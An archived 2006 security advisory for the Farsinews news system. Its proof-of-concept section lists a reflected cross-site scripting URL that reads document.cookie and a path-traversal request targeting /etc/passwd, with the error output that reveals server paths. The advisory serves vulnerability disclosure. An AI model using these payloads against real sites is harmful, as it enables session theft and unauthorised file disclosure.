Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12235
HistoryApr 15, 2006 - 12:00 a.m.

Farsinews Cross-Site Scripting & Path disclosure vulnerability

2006-04-1500:00:00
vulners.com
10

Farsinews Cross-Site Scripting & Path disclosure vulnerability

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
#Aria-Security.net Advisory
#Discovered by:R@1D3N (amin emami)
#<[email protected]>
#Gr33t to:A.u.r.a & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
» Software: Farsinews 2.5.3 Pro and below
» download Link:http://dl.farsinewsteam.com/?file=FarsiNews2.5.3Pro.zip
» Support Website:http://www.farsinewsteam.com/
» advisory:http://www.aria-security.net/advisory/farsinews/farsinews042006.txt

» Summary:
Farsinews is Powerful Persian news publishing system

» Proof of Concept:
XSS attack:
http://[target]/[farsinews_path]/search.php?selected_search_arch=><script>alert(document.cookie)</script><!–
http://[target]/[farsinews_path]/search.php?selected_search_arch=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21–

Path disclosure:
A remote user can supply a specially crafted URL to
cause the system to display an error message that
discloses the installation path and other data.
Bug exists in "index.php"

example:
http://[target]/[farsinews_path]/index.php?subaction=showfull
&id=30000000000&archive=…/…/…/…/…/…/etc/passwd%00&start_from=&ucat=
1&

Error:
Warning:
file(/home/cannonc/public_html/smf/test/data/archives/…/…/…/…/…/…/.
./…/…/etc/passwd\0.news.arch):
failed to open stream: No such file or directory in
/home/cannonc/public_html/smf/test/inc/shows.inc.php on line 62

Warning: Invalid argument supplied for foreach() in
/home/cannonc/public_html/smf/test/inc/shows.inc.php on line 270
Can not find an article with id:30000000000

Solution:
contact [email protected]